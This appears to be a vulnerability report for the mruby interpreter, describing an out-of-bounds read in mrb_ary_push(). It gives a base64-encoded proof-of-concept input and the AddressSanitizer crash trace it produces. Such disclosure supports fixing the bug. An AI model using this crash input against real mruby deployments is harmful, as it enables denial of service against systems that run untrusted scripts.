Description

OOB read occurs in mrb_ary_push().

commit : 5d9239c2c4644fa8a59d9f5159b4950569dd5e0e

Proof of Concept

# poc
$ echo -ne "WzpfXVswLDAsMCwwLDAsMCwwLDAsMCwwLDAsMCwwLDBdPTpO" | base64 -d > poc

# ASAN
$ ./bin/mruby poc

AddressSanitizer:DEADLYSIGNAL
=================================================================
==503792==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000011 (pc 0x0000004f7484 bp 0x7ffffffed6f0 sp 0x7ffffffed4a0 T0)
==503792==The signal is caused by a READ memory access.
==503792==Hint: address points to the zero page.
    #0 0x4f7484 in mrb_ary_push /home/alkyne/mruby-debug/src/array.c:503:17
    #1 0x5ee6f1 in mrb_vm_exec /home/alkyne/mruby-debug/src/vm.c:2633:9
    #2 0x5c1bca in mrb_vm_run /home/alkyne/mruby-debug/src/vm.c:1130:12
    #3 0x5bbfd9 in mrb_top_run /home/alkyne/mruby-debug/src/vm.c:3039:12
    #4 0x697a2b in mrb_load_exec /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6890:7
    #5 0x698c0b in mrb_load_detect_file_cxt /home/alkyne/mruby-debug/mrbgems/mruby-compiler/core/parse.y:6933:12
    #6 0x4cf83f in main /home/alkyne/mruby-debug/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357:11
    #7 0x7ffff7a710b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #8 0x41d6ed in _start (/home/alkyne/mruby-debug/bin/mruby+0x41d6ed)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/alkyne/mruby-debug/src/array.c:503:17 in mrb_ary_push
==503792==ABORTING